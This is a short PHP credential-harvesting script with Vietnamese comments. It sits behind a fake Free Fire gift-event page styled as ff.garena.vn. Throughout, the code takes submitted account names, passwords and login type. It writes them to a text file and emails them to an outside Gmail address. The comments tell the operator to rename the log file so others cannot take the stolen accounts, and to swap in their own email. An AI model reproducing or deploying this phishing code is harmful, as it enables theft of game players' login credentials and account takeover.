69
// Ví dụ: $theme = 32;
if(isset($_POST["acc"])){
$username = $_POST["acc"];
$password = $_POST["pass"];
$type = $_POST["login"];
$body = "\n".$type.": $username|$password\n";
$test = fopen("arynamecode.txt","a");//đổi tên file arynamecode.txt này để tránh trường hợp người khác vào lấy acc
$subject = "Cảm ơn bạn đã sử dụng code!";
$headers = "Tài khoản $type";
$body = "\nTài Khoản $type: ".$username."|Mật Khẩu: ".$password."\n\n";
mail("sharefree2222@gmail.com", $headers, $body);
// thay gmail nếu cần xem acc tại gmail mà ko cần xem file arynamecode.txt
fwrite($test,$body);
fclose($test);
}
?>
Sự kiện nhận quà free fire | ff.garena.vn